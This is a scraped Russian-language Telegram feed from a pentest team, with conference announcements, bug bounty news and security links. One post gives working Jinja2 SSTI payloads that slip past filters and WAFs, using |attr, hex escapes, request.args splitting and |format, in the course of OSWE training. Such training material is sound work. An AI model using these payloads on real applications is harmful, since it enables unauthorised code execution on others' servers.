GigaHackers
1.93K subscribers
48 photos
1 video
8 files
46 links
Информация предоставлена исключительно в образовательных или исследовательских целях. Противоправные деяния преследуются по закону.
Авторы: @WILD_41, @Oki4_Doki и @VlaDriev
Download Telegram
Всем привет👋

Пока @WILD_41 и @VlaDriev ожидали результатов премии pentest award, я успел получить презенты за акцию от TimeWeb в рамках их BB программы.

Спасибо большое @bizone_bb и @timewebru за подарки. Вы делаете крутые вещи в сфере bug bounty!💪

А я снова скажу: не бойтесь пробовать и продолжайте развиваться, всё возможно👍

#bug_bounty
[PoC Windows Downdate]

Всем привет!👋

Не так давно отгремели конференции Black Hat 2024 и DEF CON 32. Лучшие исследователи со всего мира поделились своими наработками. Хочу отметить несколько из них, которые меня заинтересовали. Публиковать буду постепенно, так как контента достаточно много.

Первый доклад, который меня зацепил - Windows Downdate: Downgrade Attacks Using Windows Updates

Автор рассказал как можно понизить версии отдельных файлов через центр обновления Windows и тем самым сделать ОС уязвимой к старым проблемам! 👍
Для понимания рекомендую к прочтению публикацию 📝

💻 И уже даже есть PoC с примерами от автора!

🐤 Ну и конечно ссылка на автора.


#Windows #PoC #AD #DC32 #BH2024 #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Работаешь в IT или с IT? Тогда тебе точно понравится на UIC DEV 2024! 💥

🖥 UIC Dev - ежегодная Технологическая конференция для специалистов из интернет-сферы: от HR-ов до IT-директоров. Да, мы не только для разработчиков, но и для аналитиков, тестировщиков, дизайнеров, маркетологов, SEO-шников, копирайтеров и т.д.

В этом году на нашей 7-ой вечеринке тебя ждут:

🎯 6 больших направлений по несколько секций: разработка, управление и анализ, бизнес+IT, дизайн и контент, маркетинг и digital, UIC Talks.
🎯 80+ докладов про инструменты, кейсы, "боли" IT-сообщества, AI и будущее.
🎯 Обсуждение актуальных событий, разбор трендов из области IT и не только.
🎯 Общение с единомышленниками, дискуссии, обмен опытом, новые идеи.
🎯 Интерактивы и розыгрыши призов на стендах партнеров.

Вечером первого дня пройдет 🔥 афтепати с выступлением группы “Стихи на окнах подъезда №8”, дискотекой, лайтовым общением и развлечениями. 🚀

📅 7-8 октября 2024 г.
📍 ТРЦ “Сигма”, г. Ижевск, пер. Широкий, 53, 3-4 эт.
❗️ Подробности: uic.dev и vk.com/uicdev
Please open Telegram to view this post
VIEW IN TELEGRAM
[Обход фильтров в SSTI в Jinja2]

Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие .__ в строке передаваемого темплейта, что не давало просто использовать пейлоад из HackTricks и наслаждаться RCE на уязвимой машине.
Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:

🔸 Для обхода фильтра по .__ можно использовать |attr()
{{ ''|attr('__class__’)}}

🔸 Можно использовать сложение строк или закодировать
{{request|attr("__"+"class"+"__")}}
{{''['\x5f\x5fclass\x5f\x5f']}}

🔸 Также можно обратиться к атрибутам по индексу
request["__class__"]

🔸 Кроме того, можно использовать Statements для определения переменных в темплейте
{% set string = "ssti" %}

{% set class = "__class__" %}

{{ string|attr(class)}}

{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}

🔸 Для обхода фильтра по __ можно использовать requests.args для передачи частей полезной нагрузки в параметрах запроса и |join для соединения элементов в одну строку
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_

🔸 Для обхода фильтра по [] можно использовать |getlist(). Данный метод возвращает всех значения, связанные с определенным ключом в запросе
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_


🔸 В случае, если встретился фильтр по |join, можно использовать |format для форматирования строк по переданным значениями
{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_


Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆


Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!

@GigaHack

#web #stand #SSTI #learn #OSWE
[Полезный читшит для SSRF, CORS и open-redirect]

В последнее время у portswigger-а активно пополняются заметки по различным темам. Эта шпаргалка содержит полезные нагрузки для обхода проверки URL. Приведенные списки слов полезны для реализации следующих типов атак: SSRF, неправильные конфигурации CORS и open-redirect. Очень полезно, если кончились идеи, а ошибку с кодом 403 обходить надо. Также будет полезно и тем, кто только погружается историю с данными веб-уязвимостями.

https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet


#web #bypass #cheet_sheet
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Опубликовали видеоролик о том, как прошла ежегодная независимая премия Pentest award 2024!

Радостные лица, толпа заряженных специалистов, и, конечно, счастливые победители с наградами в руках — настоящий праздник этичного хакинга.

Здорово было встретится в офлайне со старыми друзьями и коллегами, познакомиться с новыми людьми, обменяться знаниями и идеями, поговорить о важном, профессиональном, наболевшем.

До встречи в 2025 году 👋

Отдельная благодарность партнерам проекта: BI.ZONE Bug Bounty, VK Bug Bounty, OFFZONE и CyberED.

📺 Полное видео
🔗 Pentest award (архив)
@justsecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет! Сегодня выступаю на вебинаре у УЦ Маском (@mascom_uc). Расскажу о том как проводить разведку при пентесте внешнего периметра и веб-приложения и какие инструменты можно для этого использовать.

Ждём всех сегодня в 19.00 по МСК 😎
Кто ещё не записался, сделать это можно по 👉 ссылке

👉Презентация

#web #conference
[Регистрация уязвимостей]

Всем привет! 👋

Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом. 👀 Будучи настоящими этичными хакерами у вас может возникнуть желание сообщить об уязвимости вендору/производителю софта или оборудования, но как это это сделать?

Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE. 🐈

Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках. 📝

Иногда бывают различные выдающиеся случаи 💻, о которых лучше говорить отдельно и в формате подкаста или посиделок (кстати, если у вас есть такие истории и желание поделиться ими - дайте знать в комментах или в ЛС) ✏️

В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы. 🔥

#cve #learn #notes
Please open Telegram to view this post
VIEW IN TELEGRAM
[Кибербез комьюнити]

Всем привет! 👋

Коллеги из «ГОС ИТ Богатырева» включили наш канал в папку по кибербезопасности. 🗂

В папке собраны каналы с полезной информацией в мире ИБ на самый разный вкус! Думаю, что подборка будет расширяться и обновляться, поэтому следите за новостями!

Добавляйте к себе папку и делить с друзьями и коллегами 🏆

#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
[История одного пробива]

Всем привет! 👋

Админка на домене 5 уровня? Дефолтные креды? Пароли хранятся на фронте? SQL-injection с RCE? DNS-shell? Что это все такое? Нет - это не очередная тачка на Hack the Box и не подарок пентестеру на НГ от деда мороза. 🎁

Это тру стори от нашего коллеги @cucurucuq.

Читается достаточно легко, всем рекомендую ознакомиться - каждый может найти что-то полезное для себя. 🙏

#magazine #GigaHackers
Please open Telegram to view this post
VIEW IN TELEGRAM
Purple_ESC11.pdf
2 MB
[SOC Tech - Коллаборация SOC и Pentest]

Всем привет! 👋

Выступил на SOC Tech совместно с коллегой из SOC @nikostin26.
Рассказывали про наш опыт взаимодействия между отделами.

Из ключевых тезисов:
🟣 раскрыли нашу концепцию взаимодействия
🟣 продемонстрировали совместную работу на примере ESC11
🟣 показали необходимость и эффективность такого подхода

Из интересного:
🔴 полный chain эксплуатации ESC11 от обнаружения до получения сертификата
🔘 способы защиты от уязвимости, в том числе компенсирующие меры
🔘 способы обнаружения атаки

Презентация во вложении! 📌
В скором времени выпустим статью на эту тему, следите за новостями, готовим много всего интересного! 💗

@GigaHack

#soc_tech #AD #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
[Киберучения 2024]

Всем привет!

С 24 по 26 октября в Екатеринбурге в рамках ИТ-конгресса «Форум будущего» на базе Уральского федерального университета пройдут всероссийские студенческие Киберучения.

Помимо соревнований на форуме также будут интересные доклады и вот несколько из них:
🔔 @WILD_41 выступит с докладом "Fast recon — быстрая разведка при пентесте веб-приложения"🆒
🔔 Евгений Баклушин осветит "Важные вопросы о карьере в ИБ"😮
🔔 Также выступят наши коллеги с докладом про пентест CI/CD: "Пентест CI/CD GitLab на реальном примере"🔝


Если вы будете в Екб — обязательно рекомендуем к посещению, но можно и онлайн 👍
Регистрируйтесь и смотрите много крутых докладов!

#learn #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
Презентация

*Для ребят с киберучений УрФУ
Что общего у защитников и нападающих?
И те, и другие придут 8 ноября в 13:20 на доклад Владислава Дриева «Центр мисконфигурации AD. Берем домены с помощью SCCM».

Регистрируйтесь на форум, чтобы не пропустить выступление.
This media is not supported in your browser
VIEW IN TELEGRAM
[Импортозамещенный взгляд на социальную инженерию: что, если не Word & Windows]

Всем привет!👋

Уже 8 ноября я выступлю на SOC-FORUM 2024 совместно с @Nam3User. Поговорим за социалку😂

Зачастую атаки методами социальной инженерии так или иначе задействуют Microsoft Office, однако в условиях импортозамещения компании начинают переходить на альтернативные офисные пакеты. Защищены ли пользователи альтернативных решений от атак методами социальной инженерии? Расскажем в нашем докладе.

Программу с другими докладами можно посмотреть тут. Онлайн также обещают подвезти ▶️

#conference #soc_forum2024
Please open Telegram to view this post
VIEW IN TELEGRAM